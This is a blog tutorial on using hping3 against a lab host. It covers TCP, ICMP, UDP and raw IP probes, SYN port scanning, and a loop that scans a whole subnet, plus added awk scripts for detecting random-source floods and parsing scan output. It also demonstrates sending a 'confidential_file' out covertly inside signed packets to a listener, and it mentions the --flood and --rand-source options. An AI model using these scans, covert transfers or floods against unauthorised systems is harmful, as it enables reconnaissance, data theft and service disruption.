Tuesday, January 31, 2012

[DIY] Tools - Using Hping


Here's a quick hping usage tutorial.

From the man page:
hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping program does with ICMP replies. hping3 handle fragmentation, arbitrary packets body and size and can be used in order to transfer files encapsulated under supported protocols. Using hping3 you are able to perform at least the following stuff:
- Test firewall rules
- Advanced port scanning
- Test net performance using different protocols, packet size, TOS (type of service) and fragmentation.
- Path MTU discovery
- Transferring files between even really fascist firewall rules.
- Traceroute-like under different protocols.
- Firewalk-like usage.
- Remote OS fingerprinting.
- TCP/IP stack auditing.
- A lot of others.
Refer to man hping3 and hping3 --help for detailed options & switches.

Let's start with some common base options, which are pretty self-explanatory, and then move on to the modes and the rest:
root@victor:xd# hping3 --help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info

...snip...
I would like to mention one switch in the IP options category: --rand-source. It makes hping pick a random source address for every packet it sends, which is what makes it useful for (stress) testing stateful firewalls. The same property can fill up the firewall's state table, causing legitimate users and traffic to be dropped, so keep this in mind when using this option.
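The state-table risk above is also what makes --rand-source traffic stand out on the defending side: every packet looks like a brand-new client, so one sender shows up as a burst of distinct source addresses against a single destination. The following is an added example, not code from the original post or from the hping project: a small awk-based detector that flags any one-second bucket in which a destination saw at least THRESHOLD distinct sources. The log format ("epoch_seconds src dst dport", one connection per line), the sample lines (using RFC 5737 documentation addresses for the spread-out sources) and the function name are all constructed for this example.

```shell
# Added example (not from the original post): flag bursts of distinct
# source addresses per destination, the pattern --rand-source produces.
# Constructed connection log, one line per new connection:
#   epoch_seconds src dst dport
SAMPLE_CONN_LOG='1327996800 10.0.0.5 172.72.5.139 80
1327996800 10.0.0.6 172.72.5.139 443
1327996801 198.51.100.7 172.72.5.139 80
1327996801 203.0.113.9 172.72.5.139 80
1327996801 192.0.2.33 172.72.5.139 80
1327996801 198.51.100.88 172.72.5.139 80
1327996801 203.0.113.140 172.72.5.139 80
1327996801 192.0.2.201 172.72.5.139 80
1327996801 10.0.0.5 172.72.5.139 80
1327996802 10.0.0.5 172.72.5.139 80'

# flag_source_bursts THRESHOLD: read the log on stdin and print
# "second dst distinct_sources" for every one-second bucket in which a
# destination saw at least THRESHOLD distinct source addresses.
flag_source_bursts() {
    awk -v thr="$1" '
        {
            bucket = $1 SUBSEP $3            # key: (second, destination)
            if (!((bucket SUBSEP $2) in seen)) {
                seen[bucket SUBSEP $2] = 1   # count each source once per bucket
                distinct[bucket]++
            }
        }
        END {
            for (b in distinct)
                if (distinct[b] >= thr) {
                    split(b, k, SUBSEP)
                    print k[1], k[2], distinct[b]
                }
        }' | sort
}

# Stand-alone run on the constructed sample: only second 1327996801
# crosses a threshold of 5 (seven distinct sources hit 172.72.5.139).
printf '%s\n' "$SAMPLE_CONN_LOG" | flag_source_bursts 5
```

The threshold is deliberately a parameter: a busy public service legitimately sees many distinct clients per second, so the value has to be set from the destination's normal baseline rather than copied from this sample.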

Okay, moving on.

By default, hping continuously sends TCP packets with no TCP flags set to the target host's port 0. A live target responds with a RST packet (RST-ACK in the output below), confirming that it is up.

root@victor:xd# hping3 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): NO FLAGS are set, 40 headers + 0 data bytes
len=40 ip=172.72.5.139 ttl=128 id=32996 sport=0 flags=RA seq=0 win=0 rtt=13.4 ms
len=40 ip=172.72.5.139 ttl=128 id=32997 sport=0 flags=RA seq=1 win=0 rtt=0.7 ms
len=40 ip=172.72.5.139 ttl=128 id=32998 sport=0 flags=RA seq=2 win=0 rtt=0.4 ms
^C
--- 172.72.5.139 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/4.8/13.4 ms

There are several modes that we can use hping in. Default mode is TCP.
root@victor:xd# hping3 --help
usage: hping3 host [options]
...
snip
...
Mode
  default mode TCP
  -0 --rawip RAW IP mode
  -1 --icmp ICMP mode
  -2 --udp UDP mode
  -8 --scan SCAN mode.
                   Example: hping --scan 1-30,70-90 -S www.target.host
  -9 --listen listen mode

...
snip
...

RAW IP mode sends the packets without a TCP or UDP header. To send raw IP packets to the target, use the -0 or --rawip switch:
root@victor:xd# hping3 --rawip 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): raw IP mode set, 20 headers + 0 data bytes
^C
--- 172.72.5.139 hping statistic ---
19 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms


As we see here, the target (like most systems) silently drops the raw IP packets.

With ICMP mode, hping sends ICMP packets to the target. By default, ICMP echo-requests are sent.

root@victor:xd# hping3 --icmp 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): icmp mode set, 28 headers + 0 data bytes
len=28 ip=172.72.5.139 ttl=128 id=309 icmp_seq=0 rtt=3.8 ms
len=28 ip=172.72.5.139 ttl=128 id=310 icmp_seq=1 rtt=0.6 ms
len=28 ip=172.72.5.139 ttl=128 id=311 icmp_seq=2 rtt=0.4 ms
^C
--- 172.72.5.139 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/1.6/3.8 ms
We can easily set another ICMP type/code by using the -C / --icmptype or -K / --icmpcode switches.
root@victor:xd# hping3 --help
usage: hping3 host [options]...
snip
...
ICMP
  -C --icmptype icmp type (default echo request)
  -K --icmpcode icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help display help for others icmp options

...
snip
...

For example, to send an ICMP timestamp request (ICMP type 13, code 0) with --icmptype:
root@victor:xd# hping3 -c 3 --icmptype 13 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): icmp mode set, 28 headers + 0 data bytes
len=40 ip=172.72.5.139 ttl=128 id=321 icmp_seq=0 rtt=0.9 ms
ICMP timestamp: Originate=78180467 Receive=1459333124 Transmit=1459333124
ICMP timestamp RTT tsrtt=1
len=40 ip=172.72.5.139 ttl=128 id=322 icmp_seq=1 rtt=0.4 ms
ICMP timestamp: Originate=78181468 Receive=1056942084 Transmit=1056942084
ICMP timestamp RTT tsrtt=1
len=40 ip=172.72.5.139 ttl=128 id=323 icmp_seq=2 rtt=0.5 ms
ICMP timestamp: Originate=78182468 Receive=637774084 Transmit=637774084
ICMP timestamp RTT tsrtt=1
--- 172.72.5.139 hping statistic ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.6/0.9 ms

Or use --icmpcode switch:

root@victor:xd# hping3 -c 2 --icmpcode 0 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): icmp mode set, 28 headers + 0 data bytes
len=28 ip=172.72.5.139 ttl=128 id=341 icmp_seq=0 rtt=0.5 ms
len=28 ip=172.72.5.139 ttl=128 id=342 icmp_seq=1 rtt=0.4 ms
--- 172.72.5.139 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.4/0.5/0.5 ms
Of course, the above example is just a plain ping [ICMP type 8, code 0].


Similarly, for UDP mode the -2 or --udp switch is used. By default, packets will be sent to the target host's port 0.
root@victor:xd# hping3 -c 2 --udp 172.72.5.139
HPING 172.72.5.139 (vmnet1 172.72.5.139): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=172.72.5.139 name=UNKNOWN
status=0 port=1067 seq=0
ICMP Port Unreachable from ip=172.72.5.139 name=UNKNOWN
status=0 port=1068 seq=1
--- 172.72.5.139 hping statistic ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.6/500.5/1000.3 ms
So we receive ICMP Port Unreachable, since no UDP service is running / listening on that port of the target.

Next is the Scan Mode. We can switch to scan mode by using the -8 or --scan switch. A port, a range of ports or an alias is expected as an argument. There are 2 aliases supported currently: all and known. 'all' means all ports 0-65535; 'known' uses all the ports listed in the /etc/services file.

root@victor:xd# hping3 -8 21,22,23,135,139,445 172.72.5.139
Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports:
We did not receive any service identification or confirmation response back from the target host. Or at least we do not know the response details yet.

We can use -V switch to get the response info.
root@victor:xd# hping3 -8 21,22,23,135,139,445 172.72.5.139 -V
using vmnet1, addr: 172.72.5.1, MTU: 1500
Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp : ..R.A... 128 44033 0 40
   22 ssh : ..R.A... 128 44289 0 40
   23 telnet : ..R.A... 128 44545 0 40
  135 loc-srv : ..R.A... 128 44801 0 40
  139 netbios-ssn: ..R.A... 128 45057 0 40
  445 microsoft-d: ..R.A... 128 45313 0 40
All replies received. Done.
Not responding ports:
Okay, it appears that the target host is simply sending a RST-ACK to all our scan packets.

Remember that by default, hping will NOT set any TCP flags - SYN, ACK, RST, PSH, URG, FIN. Let's set the SYN flag and scan again.
root@victor:xd# hping3 -8 21,22,23,135,139,445 172.72.5.139 -V -S
using vmnet1, addr: 172.72.5.1, MTU: 1500
Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp : .S..A... 128 50177 64240 44
   22 ssh : ..R.A... 128 50433 0 40
   23 telnet : ..R.A... 128 50689 0 40
  135 loc-srv : .S..A... 128 50945 64240 44
  139 netbios-ssn: .S..A... 128 51201 64240 44
  445 microsoft-d: .S..A... 128 51457 64240 44
All replies received. Done.
Not responding ports:
Alright, with SYN packets, we now find that the target responds back with SYN-ACK for some ports and RST-ACK for other ports.
A SYN-ACK implies that the ports [21,135,139,445] are open, whereas a RST-ACK for ports 22, 23 tells us they are closed / no ssh or telnet on the target box.

Now try using the aliases:


root@victor:xd# hping3 -8 known 172.72.5.139 -S
Scanning 172.72.5.139 (172.72.5.139), port known
317 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
  135 loc-srv : .S..A... 128 25860 64240 44
  139 netbios-ssn: .S..A... 128 26628 64240 44
  445 microsoft-d: .S..A... 128 34820 64240 44
   21 ftp : .S..A... 128 774 64240 44
All replies received. Done.
Not responding ports:


root@victor:xd# hping3 -8 all 172.72.5.139 -S
Scanning 172.72.5.139 (172.72.5.139), port all
65536 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
21 ftp : .S..A... 128 9127 64240 44
135 loc-srv : .S..A... 128 38311 64240 44
139 netbios-ssn: .S..A... 128 39335 64240 44
445 microsoft-d: .S..A... 128 33214 64240 44
52111 : .S..A... 128 8910 64240 44
All replies received. Done.
Not responding ports: (3130 icpv2) (3131 ) (3132 ) (3133 ) (3134 ) (3135 ) (3136 ) (3137 ) (3138 ) (3139 ) (3140 ) (3141 ) (3142 ) (3143 ) (3144 ) (3145 ) (3146 ) (3147 ) (3148 ) (3149 ) (3150 ) (3151 ) ...snip...
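Reading the scan table by hand is fine for six ports, but for the 'known' and 'all' aliases it helps to let a script apply the rule above (SYN-ACK means open, RST-ACK means closed). The following is an added example, not code from the original post or from the hping project: an awk-based parser for the -8 output that classifies each reply row from its flags column. The sample output is constructed to mirror the post's "-V -S" scan plus the stray 52111 row from the 'all' scan; the function names are mine, and the full letter set assumed for the flags column (F S R P A U X Y) is an assumption, since only S, R and A appear in the post's output.

```shell
# Added example (not from the original post): parse "hping3 --scan"
# output and classify ports from the flags column of each reply.
# Constructed sample mirroring the post's scan tables.
SAMPLE_SCAN='Scanning 172.72.5.139 (172.72.5.139), port 21,22,23,135,139,445
6 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
   21 ftp : .S..A... 128 50177 64240 44
   22 ssh : ..R.A... 128 50433 0 40
   23 telnet : ..R.A... 128 50689 0 40
  135 loc-srv : .S..A... 128 50945 64240 44
  139 netbios-ssn: .S..A... 128 51201 64240 44
  445 microsoft-d: .S..A... 128 51457 64240 44
52111 : .S..A... 128 8910 64240 44
All replies received. Done.
Not responding ports:'

# classify_scan: read scan output on stdin, print "port state" for every
# reply row. A reply row starts with a numeric port; its flags column is
# the 8-character field made only of dots and the (assumed) flag letters
# F S R P A U X Y, which no service-name or counter column can match.
# Banner, table-border and summary lines are skipped.
classify_scan() {
    awk '
        $1 ~ /^[0-9]+$/ {
            flags = ""
            for (i = 2; i <= NF; i++) {
                if (length($i) == 8 && $i ~ /^[.FSRPAUXY]+$/) { flags = $i; break }
            }
            if (flags == "") next
            if (flags ~ /S/ && flags ~ /A/) state = "open"
            else if (flags ~ /R/) state = "closed"
            else state = "other"
            print $1, state
        }'
}

# ports_in_state STATE: space-separated list of ports in that state.
ports_in_state() {
    classify_scan | awk -v want="$1" '
        $2 == want { list = list (list == "" ? "" : " ") $1 }
        END { print list }'
}
open_ports()   { ports_in_state open; }
closed_ports() { ports_in_state closed; }

# Stand-alone run on the constructed sample (pipe real -8 output
# through classify_scan in the same way).
printf '%s\n' "$SAMPLE_SCAN" | classify_scan
```

Ports that never answer do not produce a reply row at all; they only appear in the trailing "Not responding ports:" list, so a missing port in this parser's output means filtered or dropped rather than closed.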

Final mode is the Listen mode, activated by the -9 or --listen switch. Basically, when started in listen mode, hping waits for an incoming packet. hping expects a signature in the incoming packet. Once it finds the signature, hping then dumps the packet, starting -from- the signature -to- the packet end.

For example, on my *nix box, I start hping in listen mode and set the signature as 'JackP0t'. Note that in listen mode, we need to specify the interface to listen on [in case there are multiple interfaces on your box]. Next, on the Windows target box, I start hping and give it the file 'confidential_file' as the data input. Remember that this data file content will be 'prepended' with the signature 'JackP0t' when it goes out in the packet.
root@victor:xd# hping3 --help
usage: hping3 host [options]...
snip
...
Common
  -d --data data size (default is 0)
  -E --file data from file
  -e --sign add 'signature'
  -j --dump dump packets in hex
  -J --print dump printable characters
  -B --safe enable 'safe' protocol
  -u --end tell you when --file reached EOF and prevent rewind
  -T --traceroute traceroute mode (implies --bind and --ttl 1)
  --tr-stop Exit when receive the first not ICMP in traceroute mode
  --tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
  --tr-no-rtt Don't calculate/show RTT information in traceroute mode

...
snip
...
On *nix box:
root@victor:xd# hping3 --listen JackP0t -I vmnet1
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.Secret data.
<--- content in the file 'confidential_file' which we sent in the packets. hping listener sees the signature 'JackP0t' and then dumps bytes that follow.
From Windows system:
C:\Documents and Settings\Administrator\Desktop\hping2.win32>hping --data 100 --file confidential_file.txt -e JackP0t 172.72.5.1 -V --end
<--- we have set a data size of 100 bytes, specified the file 'confidential_file.txt' as data input, set 'JackP0t' as the signature, used the verbose option to see responses and, lastly, used the --end option to tell us when the file reaches EOF.
using AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport, addr: 172.72.5.139, MTU: 1500
HPING (XPSP2) 172.72.5.1 (AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport 172.72.5.1): NO FLAGS are set, 40 headers + 100 data bytes
[main] memlockall(): No error
Warning: can't disable memory paging!
EOF reached, wait some second than press ctrl+c
len=46 ip=172.72.5.1 ttl=64 DF id=0 tos=0 iplen=40
sport=0 flags=RA seq=0 win=0 rtt=16.0 ms
seq=0 ack=141 sum=7441 urp=0
EOF reached, wait some second than press ctrl+c
len=46 ip=172.72.5.1 ttl=64 DF id=0 tos=0 iplen=40
sport=0 flags=RA seq=1 win=0 rtt=0.0 ms
seq=0 ack=26600 sum=17da urp=0

Do note that hping does NOT allow us to scan or send packets to a range of IP addresses. However, we can automate it using a bit of shell scripting.

Let's say we want to send 1 single SYN packet to all 'known' alias ports on all hosts in 172.72.5.0/24 network. This can be done as follows:
for i in `seq 1 255`; do hping3 --count 1 -8 known -S 172.72.5.$i; done
.....

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.